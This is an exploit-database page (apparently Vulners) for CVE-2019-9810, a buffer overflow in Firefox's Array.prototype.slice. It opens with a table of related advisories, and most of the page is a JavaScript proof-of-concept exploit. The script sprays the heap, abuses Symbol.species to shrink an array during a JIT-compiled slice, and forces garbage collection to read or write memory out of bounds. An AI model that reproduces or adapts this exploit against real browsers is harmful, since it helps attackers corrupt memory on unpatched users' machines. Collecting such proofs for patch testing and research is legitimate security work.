Firefox Array.prototype.slice Buffer Overflow Exploit version 66.0.
Reporter | Title | Published | Views | Family All 156 |
---|---|---|---|---|
Check Point Advisories | Mozilla Firefox IonMonkey JIT Compiler Buffer Overflow (CVE-2019-9810) | 3 Apr 201900:00 | – | checkpoint_advisories |
Prion | Buffer overflow | 26 Apr 201917:29 | – | prion |
Packet Storm | Firefox Array.prototype.slice Buffer Overflow | 27 Mar 201900:00 | – | packetstorm |
UbuntuCve | CVE-2019-9810 | 25 Mar 201900:00 | – | ubuntucve |
NVD | CVE-2019-9810 | 26 Apr 201917:29 | – | nvd |
Veracode | Buffer Overflow | 16 May 201903:58 | – | veracode |
Exploit DB | Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow | 26 Mar 201900:00 | – | exploitdb |
Exploit DB | Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack | 7 Dec 201900:00 | – | exploitdb |
Zero Day Initiative | (Pwn2Own) Mozilla Firefox Array.slice Out-Of-Bounds Write Remote Code Execution Vulnerability | 15 Apr 201900:00 | – | zdi |
Debian CVE | CVE-2019-9810 | 26 Apr 201917:29 | – | debiancve |
Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow
<script>
let size = 64;
garr = [];
j = 0;
function gc(){
var tmp = [];
for(let i = 0;i < 0x20000;i++){
tmp[i] = new Uint32Array(size * 2);
for(let j = 0;j < (size*2);j+=2){
tmp[i][j] = 0x12345678;
tmp[i][j+1] = 0xfffe0123;
}
}
garr[j++] = tmp;
}
let arr = [{},2.2];
let obj = {};
obj[Symbol.species] = function(){
victim.length = 0x0;
for(let i = 0;i < 0x2000;i++){
gvictim[i].length = 0x0;
gvictim[i] = null;
}
gc();
//Array.isArray(garr[0][0x10000]);
return [1.1];
}
let gvictim = [];
for(let i = 0;i < 0x1000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);
for(let i = 0x1000;i < 0x2000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
function fake(arg){
}
for(let i = 0;i < size;i++){
fake["x"+i.toString()] = 2.2;
}
function jit(){
victim[1] = 1.1;
arr.slice();
//fake.x2 = 6.17651672645e-312;
return victim[2];
}
flag = 0;
for(let i = 0;i < 0x10000;i++){
xx = jit();
}
arr.constructor = obj;
Array.isArray(victim);
alert(333);
alert(jit());
</script>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo